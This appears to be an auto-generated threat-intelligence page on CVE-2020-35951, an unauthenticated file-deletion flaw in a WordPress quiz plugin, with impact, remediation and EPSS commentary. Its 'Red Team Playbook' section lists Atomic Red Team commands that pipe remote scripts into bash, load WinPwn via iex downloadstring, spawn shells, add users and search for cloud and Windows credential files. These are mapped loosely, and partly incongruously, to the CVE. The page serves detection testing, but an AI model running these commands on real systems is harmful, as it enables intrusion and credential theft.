CVE-2020-35951
Overview
This vulnerability is an improper access control flaw (CWE-306) in the Quiz and Survey Master WordPress plugin prior to version 7.0.1. The root cause lies in the qsm_remove_file_fd_question function, which lacks proper authentication checks, allowing unauthenticated users to invoke file deletion operations. The affected component is the file deletion mechanism intended for users to remove their own quiz-answer files, but it erroneously permits deletion of arbitrary files on the server.
Vulnerability Description
An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
Impact
An unauthenticated attacker can delete critical files on the WordPress server, including configuration files like wp-config.php, resulting in site downtime and potential complete site takeover by reinstalling WordPress under attacker control. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward over the network. The vulnerability's scope is changed (S:C), and it impacts confidentiality, integrity, and availability at low levels (C:L/I:L/A:H). This can cause significant operational disruption and compromise of the affected WordPress site.
Solution
Users should upgrade the Quiz and Survey Master WordPress plugin to version 7.0.1 or later, where this vulnerability is patched. Detailed patch instructions and advisory information are available from Wordfence at https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ and from WPScan at https://wpscan.com/vulnerability/10348. No alternative workarounds are documented; applying the vendor-provided update is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Quiz and Survey Master plugin for WordPress is a critical flaw that allows unauthorized users to delete arbitrary files from the server. This issue arises from improper access controls within the function responsible for file deletions, specifically the qsm_remove_file_fd_question function. Intended for users to manage their quiz-answer files, the function inadvertently permits unauthenticated access, enabling any visitor to issue delete commands. This oversight can lead to the removal of crucial files such as wp-config.php, which is essential for the configuration and operation of WordPress sites. The high severity of this vulnerability is underscored by its potential to disrupt services and compromise site integrity.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could craft a simple HTTP request targeting the vulnerable function, bypassing authentication mechanisms entirely. Once access is gained, the attacker can issue commands to delete critical files on the server. This could lead to a complete denial of service, as the removal of wp-config.php would prevent the WordPress instance from functioning. Furthermore, the attacker could leverage this access to reinstall WordPress under their control, effectively taking over the site. This scenario illustrates a straightforward yet effective method for an attacker to gain control over a WordPress installation, making it a significant concern for site administrators.
The real-world impact of this vulnerability can be profound, particularly for businesses that rely on their online presence for revenue generation and customer engagement. A successful attack could lead to prolonged downtime, loss of sensitive data, and damage to the organization's reputation. The financial implications could be severe, ranging from lost sales during downtime to costs associated with recovery efforts and potential legal liabilities if customer data is compromised. Additionally, the ease of exploitation means that even less sophisticated attackers could potentially leverage this vulnerability, increasing the risk for organizations that utilize the affected plugin.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the Quiz and Survey Master plugin to the latest version is crucial, as developers often release patches to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests targeting the vulnerable function. Monitoring server logs for unusual activity, such as unexpected file deletions or unauthorized access attempts, can also aid in early detection of exploitation attempts. Furthermore, organizations should conduct regular security audits of their WordPress installations to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability in the Quiz and Survey Master plugin represents a significant threat to WordPress sites, with the potential for severe operational and reputational damage. Understanding the technical details, potential attack vectors, and real-world implications is essential for organizations to safeguard their digital assets. By adopting robust detection and mitigation strategies, businesses can protect themselves against exploitation and ensure the integrity of their online operations. The proactive management of such vulnerabilities is not just a technical necessity but a critical component of overall business resilience in an increasingly digital landscape.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-35951, rising by over 30% and placing it within the 0.99th percentile of exploit likelihood. This upward trend, coupled with a steady weekly increase, signals growing attacker interest or improved exploit reliability, despite the absence of newly reported exploit techniques or active campaigns in our telemetry. For defenders, this shift underscores an elevated risk posture, as the vulnerability’s critical impact—allowing unauthenticated deletion of key WordPress files—remains a potent vector for site compromise and service disruption. The heightened EPSS score suggests that threat actors may be prioritizing this vulnerability in their targeting strategies, increasing the urgency for vigilant monitoring. Consequently, the threat level associated with CVE-2020-35951 should be considered more acute, reflecting its increased potential for exploitation and operational impact.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Expresstech | Quiz And Survey Master | All |
cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-35951 |
| wordfence.com |
GitHub CVE
x_refsource_MISC
|
https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ |
| wpscan.com |
GitHub CVE
x_refsource_MISC
|
https://wpscan.com/vulnerability/10348 |